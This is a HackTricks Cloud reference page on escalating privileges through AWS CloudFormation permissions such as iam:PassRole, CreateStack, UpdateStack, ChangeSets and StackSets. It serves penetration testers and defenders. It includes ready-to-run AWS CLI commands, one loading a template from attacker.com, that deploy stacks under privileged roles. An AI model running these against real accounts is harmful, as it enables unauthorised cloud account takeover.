HackTricks CloudAWS - Cloudformation Privesc
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
cloudformation
For more information about cloudformation check:
AWS - CloudFormation & Codestar Enum
iam:PassRole, cloudformation:CreateStack
An attacker with these permissions can escalate privileges by crafting a CloudFormation stack with a custom template, hosted on their server, to execute actions under the permissions of a specified role:
aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>
In the following page you have an exploitation example with the additional permission cloudformation:DescribeStacks:
iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks
Potential Impact: Privesc to the cloudformation service role specified.
iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)
In this case you can abuse an existing cloudformation stack to update it and escalate privileges as in the previous scenario:
aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1
The cloudformation:SetStackPolicy permission can be used to give yourself UpdateStack permission over a stack and perform the attack.
Potential Impact: Privesc to the cloudformation service role specified.
cloudformation:UpdateStack | cloudformation:SetStackPolicy
If you have this permission but no iam:PassRole you can still update the stacks used and abuse the IAM Roles they have already attached. Check the previous section for exploit example (just don't indicate any role in the update).
The cloudformation:SetStackPolicy permission can be used to give yourself UpdateStack permission over a stack and perform the attack.
Potential Impact: Privesc to the cloudformation service role already attached.
iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)
An attacker with permissions to pass a role and create & execute a ChangeSet can create/update a new cloudformation stack abuse the cloudformation service roles just like with the CreateStack or UpdateStack.
The following exploit is a variation of the CreateStack one using the ChangeSet permissions to create a stack.
aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1
echo "Waiting 2 mins to change the stack"
sleep 120
aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1
echo "Waiting 2 mins to execute the stack"
sleep 120
aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1
The cloudformation:SetStackPolicy permission can be used to give yourself ChangeSet permissions over a stack and perform the attack.
Potential Impact: Privesc to cloudformation service roles.
(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)
This is like the previous method without passing IAM roles, so you can just abuse already attached ones, just modify the parameter:
--change-set-type UPDATE
Potential Impact: Privesc to the cloudformation service role already attached.
iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)
An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles.
Potential Impact: Privesc to cloudformation service roles.
cloudformation:UpdateStackSet
An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles.
Potential Impact: Privesc to the attached cloudformation roles.
References
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.